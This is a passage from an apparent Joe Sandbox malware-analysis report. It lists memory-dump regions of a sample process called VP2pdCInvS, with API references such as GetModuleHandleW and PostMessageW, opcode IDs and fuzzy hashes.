                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2230708285.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_29e0000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                                                                          • Opcode ID: 11c04b3660cf8777380bff5535834d818442a645680e984c4049eda4aeddf79b
                                                                                                                                                                                                                                          • Instruction ID: fc36556f7919aceee3fa61afaffaca710f22fe6b0e5dc33d373d6e9e89a49de4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11c04b3660cf8777380bff5535834d818442a645680e984c4049eda4aeddf79b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70110FB6C003498FCB20DF9AC444A9EFBF8FB89314F14841AD429B7614C379A545CFA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 079838B5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2253329749.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7980000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 410705778-0
                                                                                                                                                                                                                                          • Opcode ID: 2338c30b6a6db7ade439d04e4411f1fed95b96f7920802ba1de6dd18e48e6891
                                                                                                                                                                                                                                          • Instruction ID: 7e9c72b7dde545344ecf109dca76d61ae755f852c69ff22c0ba94a73fa8c31aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2338c30b6a6db7ade439d04e4411f1fed95b96f7920802ba1de6dd18e48e6891
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A21122B580034A9FDB50DF9AC844BDEBFF8EF58314F20881AE518A7200D379A944CFA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 029EB086
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2230708285.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_29e0000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                                                                          • Opcode ID: f7cfefdca6ef3b3865e19e68a8217cb57e31814e06f15cf85b1c9ceb22a87522
                                                                                                                                                                                                                                          • Instruction ID: ff343c0d55108abb2a8b9cea2340e1662565754a8189226cc5834807f112633c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7cfefdca6ef3b3865e19e68a8217cb57e31814e06f15cf85b1c9ceb22a87522
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC11DFB5C003498FDB20DF9AC444A9EFBF8BB89314F14845AD429B7614C379A545CFA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 079838B5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2253329749.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7980000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 410705778-0
                                                                                                                                                                                                                                          • Opcode ID: 585e3182a4f85ddd6c8c8a237f1fca861fbff1bd45315fd07fa6aee0a67752e1
                                                                                                                                                                                                                                          • Instruction ID: 8e6a662c2636f50b144b79834ea0b56d39177a0cce1c85120bb1514eff7c0a93
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 585e3182a4f85ddd6c8c8a237f1fca861fbff1bd45315fd07fa6aee0a67752e1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF1103B58003499FDB50DF9AC988BDEBBF8FB48714F10881AE518B7640C379A944CFA1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          • Opcode ID: 81d7df0e5365f854b8e3acc289600c9c294a999974a2abfc2aade22ebbd85f9a
                                                                                                                                                                                                                                          • Instruction ID: 9c7b1d1beca9b4d4e9cf65e7820a96656aa2a0a29045845cb9df37cae496e33f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81d7df0e5365f854b8e3acc289600c9c294a999974a2abfc2aade22ebbd85f9a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EC16E34A00602CFCB65CF18C58096ABBF2FF89320715CA59D55A9B665D730FD86CFA0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246681206.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6380000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4e6bdf9af851b046612025c899b8e1b369cfa881868078112a09b3a6ad9ca71a
                                                                                                                                                                                                                                          • Instruction ID: aadab390431a7e212dce42290faaeff347954300d51d1148ce60c11e10baa8cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e6bdf9af851b046612025c899b8e1b369cfa881868078112a09b3a6ad9ca71a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49C28330B502189FCB55DF68C951EEE7BB6EF88700F108099E606AB3A0DB719E45DF91
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4']q
                                                                                                                                                                                                                                          • API String ID: 0-1259897404
                                                                                                                                                                                                                                          • Opcode ID: 7cfd5c86deec71eb3eb84c4e79ea691b182402d1f7beec3785655b2636c5cac5
                                                                                                                                                                                                                                          • Instruction ID: cd16514c88b0258401d2237173a9599a27c5a532653a4e84fbff132e4a758d18
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7cfd5c86deec71eb3eb84c4e79ea691b182402d1f7beec3785655b2636c5cac5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B331E171B042114FCB19AB38E45456A7BEADFCA31070549BAD44A8B395DE29EC07CBE1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4']q
                                                                                                                                                                                                                                          • API String ID: 0-1259897404
                                                                                                                                                                                                                                          • Opcode ID: a4ac6da01df8b041dbc2e375a940c28fa08393aa6eb2368a1bc80f32c95f2ac8
                                                                                                                                                                                                                                          • Instruction ID: 372219e13d7323984cc3e09a6068fa4af5130e2454a59be18e3584c3ec12a890
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4ac6da01df8b041dbc2e375a940c28fa08393aa6eb2368a1bc80f32c95f2ac8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5831AF31B006148FCB09EB78E95856E37E7AFC8200B544879E50ACF384EE75AC06C7E2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4']q
                                                                                                                                                                                                                                          • API String ID: 0-1259897404
                                                                                                                                                                                                                                          • Opcode ID: 7ca79cfb5e308336709ede2b0a2200b03ef49a3394e1aada518adf05301c469c
                                                                                                                                                                                                                                          • Instruction ID: 3f71a00b7b5f594d049076184afb4e834d51d9154880fb2b47e98993c4f1fb51
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ca79cfb5e308336709ede2b0a2200b03ef49a3394e1aada518adf05301c469c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E01B130905249EFCB04EFB8E59459CBFF6FF45300B2455AAC985DB251DB345985CF11
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4']q
                                                                                                                                                                                                                                          • API String ID: 0-1259897404
                                                                                                                                                                                                                                          • Opcode ID: 3c467772fd5f021f2fcd1c9a700ca9bf614629c04b72d30f3d728f5a469ecb49
                                                                                                                                                                                                                                          • Instruction ID: be5db9bfa6f1ea3b0b2e7f17fe045bd89b35023119e0c38c052e68863b3cb813
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c467772fd5f021f2fcd1c9a700ca9bf614629c04b72d30f3d728f5a469ecb49
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFF08C30E01209EFCB04FFB8E65895CBBB6FF84205F2451A9C94697214EB349A44CB45
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246681206.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6380000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d2010dc9050e4cccc4c838b2df59f7d2b54c533761900807986e1398a35f980e
                                                                                                                                                                                                                                          • Instruction ID: cc613639484fd28d8203f5e2730dc570a7b27091c6c5cbd0f2fa53cc0dc6da07
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2010dc9050e4cccc4c838b2df59f7d2b54c533761900807986e1398a35f980e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91624D34B502049FCB44DF68C994EAEBBF6EF89710F108099E606DB3A5DA71ED44CB91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246681206.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6380000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 54587b681ee46873910707a0102d27eec3007bde5ca9b60ad7e3de2c5461ce0c
                                                                                                                                                                                                                                          • Instruction ID: b3e15dec1e16e8c099daddcbbec71cc31c6c1391d39d37f5accd1fed7c376770
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54587b681ee46873910707a0102d27eec3007bde5ca9b60ad7e3de2c5461ce0c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16429A307406158FCB29AF78D950A6E7AA6FFC6704B01096CD5479B294CFB9EC09CBC6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f4fc4f4ed05a7252b51a7dd71ee76bb52fa1477d51e1cd5343d6e3c30baaf073
                                                                                                                                                                                                                                          • Instruction ID: 026456f409470da6f0b9a25d894a57b4bc8f48f254b8d48479004c2e698298ea
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4fc4f4ed05a7252b51a7dd71ee76bb52fa1477d51e1cd5343d6e3c30baaf073
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F123C74B006018FCB54DF29D588A6ABBF6FF89304B1544A9E506CB766DB34EC46CFA0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246681206.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6380000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 138255f187e4d2300e6a0c28d40a5cd4918f5cd4bb222053066f34bcc0770fe2
                                                                                                                                                                                                                                          • Instruction ID: f3f665b780cd163da2d0a8494a3b3cea14b511f565b3df076010e64978c0bb16
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 138255f187e4d2300e6a0c28d40a5cd4918f5cd4bb222053066f34bcc0770fe2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E029F347103049FDB59AF74C954A6A7AB6FF89704F004469E6429B3A1CFB9EC09CBD2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246681206.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6380000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0756fd4325c6882fb3845463d036098dc3bb6c4933bd874257b638247940bf93
                                                                                                                                                                                                                                          • Instruction ID: 05238d431bb2d638dffc8c3eb29ca80e3be993d17c8d17e59f3884baeb22d273
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0756fd4325c6882fb3845463d036098dc3bb6c4933bd874257b638247940bf93
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21D193347103049FDB48AB64C955BA97BB6FF89704F108469E6029B3A1CFB9DC49CBD2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246681206.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6380000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 66dd4b6d4cc356bc9014506c1e6c87722f962bf057ca0b00ad5c5c4549b21c74
                                                                                                                                                                                                                                          • Instruction ID: 8a2b0183a6f6cfa5eb298854c8bcad3701219bdce7f3d2eac3a072a060a4b579
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66dd4b6d4cc356bc9014506c1e6c87722f962bf057ca0b00ad5c5c4549b21c74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEC1B434B103049FDB48AB64C955BB97BB6FF89704F108065E6029B3A1CFB9DC49CB92
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246681206.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6380000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f83af223697a96fb3dedb6e192c0ce1e1117ce4caabc24ac0e9f29f1b8444c39
                                                                                                                                                                                                                                          • Instruction ID: e69f839ab33fe96ec566ab86c9074f8277c76055395cc00e4887fd985a126739
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f83af223697a96fb3dedb6e192c0ce1e1117ce4caabc24ac0e9f29f1b8444c39
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DC175347103049FEB48AB64C959FB976B6FF89704F108065EA029B3A1CFB9DD49CB91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dcafe57e75f85b8af29b07e8e8ed724a8d28ddb60c5f10239f78378a66bc12f0
                                                                                                                                                                                                                                          • Instruction ID: 8c5d29365cf40ecddc651b7f7b7a978aca60809e53071ad69068981f4abae528
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dcafe57e75f85b8af29b07e8e8ed724a8d28ddb60c5f10239f78378a66bc12f0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F25126B1E20218CFDF55CFA9C884BDEBBF6AF88304F148429D415AB294DB749845CF90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246681206.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6380000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 453210158b88e917c1cc4021a7e979e448eb65ced135538e8399148bf86e44fc
                                                                                                                                                                                                                                          • Instruction ID: a21ea92638509efbbb46a31439a3971dfe24fc9f7289559c68ea311ed456f0df
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 453210158b88e917c1cc4021a7e979e448eb65ced135538e8399148bf86e44fc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42514835B502099FDB44DFA9C894D9EBBF6EF89710B158069E906EB361DB30EC05CB90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 635dd8dfa75af6ae107112d88f9a7b79b647e9ad62e88e5d434d97fc3bed1af4
                                                                                                                                                                                                                                          • Instruction ID: 9e18fc7bedb7718a040c077ac74807a03d21b79e370374882d96e6e6e2fa3342
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 635dd8dfa75af6ae107112d88f9a7b79b647e9ad62e88e5d434d97fc3bed1af4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 115134B0D20218DFDF65CFA9C884BDEBBF5AF48304F148429E409AB284DB749845CFA1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 519dbbf0a96dea9888f4462b1ad6bdf84e600be59524fd59ed3c5d3a354e2037
                                                                                                                                                                                                                                          • Instruction ID: 55bfc27eb79742fc585359095f91eeca83707d1cdcbe6f8a9d0ede0bcf5f9360
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 519dbbf0a96dea9888f4462b1ad6bdf84e600be59524fd59ed3c5d3a354e2037
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72317A35B002109FCB15DF38E88896EBBB6BF89310B108569E906CB365DB35ED55CBA0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9f37020b949892c6e03801e76c0d4eded938317852f43b9de072fb1129292190
                                                                                                                                                                                                                                          • Instruction ID: 1f200597324a43e12344e18cc79123877ea108cfe3374a2ee34c41b863869414
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f37020b949892c6e03801e76c0d4eded938317852f43b9de072fb1129292190
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A316935B002109FCB55DF38E88896EBBB6FF89310B108469E906CB365DB35ED55CBA0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: eb70e75fbf3a5bc3a93b2d166b5d82891b36c0fcbb6b8b083292dac4a21ba27d
                                                                                                                                                                                                                                          • Instruction ID: c18f046fc41f46dd66d3a91f8ac4a36fc21e4087eed9f21d8e3979a5489426fd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb70e75fbf3a5bc3a93b2d166b5d82891b36c0fcbb6b8b083292dac4a21ba27d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C41F2B1D01208DFDF58DFAAD944ADEBBB6AF88310F10842AD419B7250DB34A945CFA0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4d249af1f2c77ae35dc788275cbdee83538503df0e21358b853570c9a3b605af
                                                                                                                                                                                                                                          • Instruction ID: 2dedf124ddd8f8f674f237cf9a4b8c3f1b31d8cde0bca3170e4e0612bdd5d7f1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d249af1f2c77ae35dc788275cbdee83538503df0e21358b853570c9a3b605af
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 603111B0D012089FDF58DFAAC944ADEBFF6AF88300F14842AE419B7250DB349945CFA1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246681206.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6380000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5dda6b17afee9e3fd87bb63c95fd475bd4fadd4ae37103ff33bd7c1392c43af6
                                                                                                                                                                                                                                          • Instruction ID: eab8b13a4327c89e531c2e5b3c1a8331773b414c536311d36ec102178c3be54b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5dda6b17afee9e3fd87bb63c95fd475bd4fadd4ae37103ff33bd7c1392c43af6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7021F7347003459FDB41EBA9DC408AABBFBAFC6210715856AE415CB6A1DB30CD15C7E2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ce2ffd1619560211aa5c589f24b0c34687a3065e438590572eb10eb1dbb0ee5e
                                                                                                                                                                                                                                          • Instruction ID: 7c174717790b9289d1e97488dfe4aff6ebc031fdece0a3f087169f73bca55818
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce2ffd1619560211aa5c589f24b0c34687a3065e438590572eb10eb1dbb0ee5e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D31F2B1D01258DFDF54DFA9D894ADEBBB9EF89310F14882AE409B7240C774A945CFA0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2230344378.000000000298D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0298D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
